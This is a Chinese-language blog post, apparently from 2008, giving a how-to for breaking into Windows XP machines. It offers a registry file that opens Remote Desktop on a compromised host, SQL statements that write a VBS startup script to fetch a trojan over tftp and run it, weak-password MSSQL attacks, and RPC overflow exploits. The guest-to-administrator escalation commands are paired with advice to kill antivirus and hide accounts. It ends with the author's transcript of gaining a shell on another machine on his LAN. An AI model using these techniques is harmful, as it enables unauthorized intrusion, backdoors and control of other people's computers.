专注于互联网--专注于架构

最新标签
网站地图
文章索引
Rss订阅

首页 »安全 » 入侵XP(超经典) »正文

入侵XP(超经典)

来源: 发布时间:星期三, 2008年12月17日 浏览:58次 评论:0
最近论坛中有好多人都在问如何入侵XP而且还都在用入侵2000老思路方法对付XP这是行不通我做了个整理总结看看可以使你对XP有个清醒认识并从中找出些入侵XP思路方法
入侵xp向来都是很困难,但并不是不能入侵 只是xp安全性相对于windows其它糸列好些罢了,下面是xp些特点:
:xpipc$命名管道默认是guest用户权限登陆,并且密码不能为空,可以通过mmc 添加管理单元去修改,充许任何用户权限登陆,但需桌面交互,和获得管理员权限. (这就是为什么要开3389原因)
第 2:xp糸统不支持多用户同时登陆,同时间只能充许个用户连接和登陆,建义使用 system权限进入xp主机(也就是用溢出,溢出成功后都直接进入system32目录或种植木马),所以通过各种 思路方法入侵xp主机后步并不是添加个用户名,而是上传个木马更为实际. 在没有开启终端或仿真终端情况下,就算你拥有台xp主机用户和密码, 也没什么用
第 3:现在来说说XP远程终端连接xp自带远桌面连接(3389终端),安装时默认已经安装和启动,你只要打开电脑属性但要远程连接,还 需要更改下设置,最简单思路方法远程修改注册表(这种思路方法好处在于不用桌面交互),当 然你也可以用slave等远程桌面管理软件Software来开启但是这样容易暴露动都
会在桌面有显示.下面给出注册表修改思路方法:
新建注册表文件,内容为:
regedit4 (定要大写)

[hkey_local_machine\system\currentcontrol\control\terminal serve]
"fdenytsconnections"=dword:00000000
假如把上面注册表文件存为3389.reg,把3389.reg上传到肉机执行regedit /s 3389.reg
,这样就可以远程连接了
第 4:如果你想像2000那样映射XP共享硬盘要通过修改对方本地安全策略在【可匿名访问工享】中添加上c$,d$..等
第 5:xp中仿真终端服务启动后默认为ntlm验证,可以用xp自带tlntadmn(net start 只能在本地启动仿真终端服务)命令开启远程主机telnet,而shutdown命令可以关闭远程主机,sc命令也以配置远程服务......,这些是xp自带小工具 .
第 6:另外XP自带自动更新和防火墙也为XP增强了些安全保护

好了XP些特点介绍完了现在整理总结些入侵XP具体办法
首先我现整理总结下我得入侵体会:由于XP不支持管理员权限IPC$连接所以不能直接在DOS下复制文件但进入XP系统目录首先应该在本地主机建立个FTP服务器用来方便快捷上传和下载文件第 2:入侵系统后建立帐户时不但要把它加入ADMINISTRATORS组还要把它加入GUESTS组XP许多限制默认都是都是guest权限把它加入了管理员组无形的中就使这些连接具有了admin权限切记只是突破XP各种限制突破口第 3:在后门
选择上可以多考虑下3389这可是2000所没有你用工具开他远程桌面连接既省掉了木马被杀风险而且可以完全控制对方计算机第 4:好好利用XP【本地全策略】其实XP好多限制都来自这里包括用户和远程访问限制但同过3389远程登陆到对方主机首先就要更改它设置下面举几个例子:
【本地安全策略】-【用户权利指派】-【从网络访问此计算机】中入"guest"用户这样你就能在本地【运行】中输入
ip 浏览对方共享目录了
【本地安全策略】-【用户权利指派】-【拒绝从网络访问此计算机】中删除"guest"用户
还有很多思路方法可以为自己提高权限通过注册表等等就看你如何利用了这里就不多说了

接着介绍些入侵XP思路方法:
当然溢出还是绝对主角好处是可以得到"cmdshell"缺点就是成功率不太高要有耐心
对没打补丁XPsp1来说MS04011,MS03049漏洞还是很多(ms05039主要这对是2000)直接溢出不用在本地开端口溢出成功后用telnet直接登陆就行了
还有就是扫描135端口看有没有rpc溢出这是比较流行工具网上又很多自己去搜吧
最后是利用数据库入侵经典是mysql和mssql前者我没试过所以找了些资料大家看看吧:
mysql入侵
工具:wineggdropshell v1.35
[1]用mysql连接你拥有用户名和密码远程mysql数库.
[2]新建个数据表后,安格式把下面两行语句写到新建数据表中假如你新建数据表为aa,
(1)insert o aa values (" wshshell=createobject (""wscript.shell"")");
(2)insert o aa values ("a=wshshell.run (""cmd.exe /c (tftp -i 127.0.0.1 get win135.exe c:\\windows\\system32\\win135.exe && c:\\windows\\system32\\win135.exe -) && (net start win135)"",0)");

[3]把新建数据表为脚本文件并导出到启动项:
select * from aa o outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\\\启动\\aa.vbs";
[4]保存成功后,只要对方重启你就可以用木马登陆了

mssql,呵呵不多说了相信大家都听说过了:
首先扫描1433端口开放主机,然后用x-scan中扫描mssql弱口令 再用sqlexec连接带有弱口令主机 接着用tftp上传木马 用木马system权限登陆后,再上传3389.reg开他远程终端用3389登陆后.别忘了册掉新建用户,xp登陆对话框中会把新建用户显示出来.除非你是用内置帐户或克隆内置账户

这就是我入侵XP些经验希望可以为大家提供些参考

更新:不要指望在XP上开3389了虽然可以通过注册表开启远程桌面连接但是XP只允许个用户在同时间登陆没办法更改网上传说修改注册表思路方法:
HKEY_LOCAL_MA-CHINE\\CurrentControlSet\Control\Terminal Server\Licensing Core分支新建个名为“EnableConcurrentSessions”DWORD值将键值设置为“1”就可以让Windows XP支持两个用户
只针对XP测试版该版本目前已经快绝迹了除非把测试版3389文件替换掉XP SP2文件才能成功
1.思路:突破xp系统远程访问限制实现文件传输和远程登陆
2.工具:rpc漏洞扫描工具、溢出工具pstools工具包
3.步骤
1)步骤:rpc漏洞扫描:
推荐使用retinarpcdcom.exe(eeye公司推出专门针对RPC漏洞扫描工具)
图形界面在剑鹰网络安全小组有下载
2)步骤 2:远程溢出:
在剑鹰网络安全小组有很多该类工具下载我用xp.exe,溢出成功率极高
3)步骤 3:提升guest权限(本方案的关键):
命令:net user guest /active:yes
net localgroup aministrators guest /add
——————————————————————————————
看到这里也许你会嗤的以鼻
可这正是大家忽略地方guest有和其它所有帐号区别特性
如果你用net user guest命令将会看到下面内容:
Password required      No
这正是突破xp系统远程访问帐号限制突破口!
除了guest外其它帐号都是
Password required     yes
所以就算你有xp系统管理员帐号密码样无所作为
——————————————————————————————
当guest提升为admin权限后你试试
dir \\IP\c$ 
呵呵现在你已经有了读写权限连ipc$连接都省了~~
当然你也样可以用net use \\ip "" /user:"guest"来进行IPC$连接
(不过是多此举)
到此文件传输问题已经解决!

4)步骤 4:远程登陆
我们当然不想每次用溢出登陆对方
那么就试试opentelnet吧
>opentelnet \\ip guest "" 1 90
read ntlm failed         \\****!用administrator也是这样子
上传srv.exe试试我没试过有兴趣自己试试
我认为用p***ec方便多了命令如下:
p***ec \\ip cmd   (连ipc$不用开了爽吧)
5)有关后门:
各显神通我正好用来试试榕哥bits.dll感觉点都不好
榕哥fans可别拿鸡蛋扔我哦~~
6)注意事项:
千万别在xp系统中建新帐户(为什么?自己想想)
xp系统默认只能登陆个帐户故用3389远程登陆是不行
rpc溢出会导致对方重启要慎用尤其是服务器


由于当时只是粗略看了看自己没去试验文章里思路方法今天有时间了就测试
我在内网所以就在内网里测试吧首先用superscan扫了个网段
10.200.6.1——10.200.6.254看看那些机子开放了 5000端口
般情况下这样机子都是XP系统好了速度很快出来大片
然后我用RPC溢出工具打开填入个机子IP地址失败可能人家已经打了补丁
没关系我们继续来终于有个成功了

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

为了保险我先个机子安装个后门再说传个文件过去这个思路方法很多
TFTPFTP在命令行用脚本或者http下载都可以实现
这个需要考虑对方有没有开杀毒软件Software如果有话先传个pulist.exe以及pslist.exe过去
先把杀毒软件Software服务停止然后杀掉进程这时再传木马过去

好了我们先看看对方用户信息
C:\WINDOWS\system32>net user
net user

\\ 用户帐户
-----------------------------------------------------------------
Administrator      Guest          HelpAssistant
SUPPORT_388945a0
命令运行完毕但发生个或多个

然后我们把guest激活并加入管理员组
C:\WINDOWS\system32>net user guest /active:yes
net user guest /active:yes
命令成功完成

C:\WINDOWS\system32>net localgroup administrators guest /add
net localgroup administrators guest /add
命令成功完成

我们来看看guest帐户信息
net user guest
用户名         Guest
全名
注释          供来宾访问计算机或访问域内置帐户
用户注释
国家(地区)代码     000 (系统默认值)
帐户启用        Yes
帐户到期        从不

上次设置密码      2003/11/28 下午 02:48
密码到期        从不
密码可更改       2003/11/28 下午 02:48
需要密码        No
用户可以更改密码    No

允许工作站      All
登录脚本
用户配置文件
主目录
上次登录        从不

可允许登录小时数   All

本地组成员       *Administrators    *Guests
全局组成员       *None
命令成功完成

看看对方开共享
C:\WINDOWS\system32>net share
net share

共享名  资源            注释

------------------------------------------------------------
IPC$                     远程 IPC
G$      G:\               默认共享
F$      F:\               默认共享
ADMIN$    C:\WINDOWS           远程管理
C$      C:\               默认共享
E$      E:\               默认共享
命令成功完成


然后按照文章里思路方法进行以下是在我机子里操作
C:\>dir \\10.200.6.183\c$
登录失败: 未授予用户在此计算机上请求登录类型

C:\>net use \\10.200.6.183\ipc$ "" /user:guest
系统发生 1385

登录失败: 未授予用户在此计算机上请求登录类型

晕了不知道为什么重新在对方shell里给guest设置了个密码的后再看看
C:\>net use \\10.200.6.183\ipc$ "123456" /user:guest
系统发生 1385

登录失败: 未授予用户在此计算机上请求登录类型

用p***ec \\10.200.6.183 cmd.exe 也不行~!!!
根本不能建立IPC连接

好了我就到这里如果那位按照上面思路方法成功了说声动感超人帮忙测试
个人认为只要可以得到个shell什么事情都好说了传个后门过去命令行下控制 对方机子照样也很爽
标签:入侵xp

相关文章

读者评论

  • 共0条 分0页

发表评论

  • 昵称:
  • 内容: